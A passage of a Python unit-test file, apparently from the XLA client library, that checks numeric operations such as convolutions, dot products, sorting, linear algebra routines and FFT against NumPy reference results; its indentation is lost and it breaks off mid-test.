# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testApproxTopK(self):
if self.backend.platform != "tpu":
self.skipTest("ApproxTopK is only supported on TPU")
k = 10
qy_size = 256
db_size = 3000
feature = 128
recall_target = 0.95
b = self._NewComputation()
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Gt(p0, q0)
comparator = b.build()
qy_shape = [qy_size, feature]
db_shape = [feature, db_size]
rng = np.random.RandomState(0)
qy_arg = rng.randn(*qy_shape).astype(np.float32)
db_arg = rng.randn(*db_shape).astype(np.float32)
b = self._NewComputation()
qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
scores = ops.Dot(qy, db)
iota = ops.Iota(
b,
xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
(qy_size, db_size)), 1)
init_val = ops.Constant(b, np.float32(-1))
init_arg = ops.Constant(b, np.int32(-1))
ground_truth = ops.TopK(scores, k=k)
approx_topk = ops.ApproxTopK(
b, [scores, iota], [init_val, init_arg],
top_k=k,
reduction_dim=1,
comparator=comparator,
recall_target=recall_target)
ops.Tuple(b, [
ops.GetTupleElement(ground_truth, 1),
ops.GetTupleElement(approx_topk, 1)
])
results = self._Execute(b, [qy_arg, db_arg])
ground_truth_docids = [set(x) for x in results[0]]
hits = sum(
len(
list(x
for x in approx_topk_per_q
if x in ground_truth_docids[q]))
for q, approx_topk_per_q in enumerate(results[1]))
self.assertGreater(hits / (qy_size * k), recall_target)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
